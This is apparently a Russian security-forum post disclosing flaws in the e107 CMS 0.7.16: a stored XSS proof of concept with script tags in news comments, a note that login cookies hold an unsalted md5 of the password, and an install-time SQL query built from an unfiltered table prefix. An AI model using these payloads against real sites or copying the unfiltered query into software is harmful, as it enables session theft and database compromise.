08.11.2009, 18:36
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
e107(e107_v0.7.16_standart_RUS)
active XSS in comment's news
Код:
......./path/comment.php?comment.news.[id]
Submit comment
Subject: <script>alert(//)</script>
Comment: <script>alert(//)</script>
куки имеют вид:
1. 1a1dc91c907325c69271ddf0c944bc72
id. md5(pass)
при инстале префикс таблиц не фильтруется
Код:
mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
|
|
|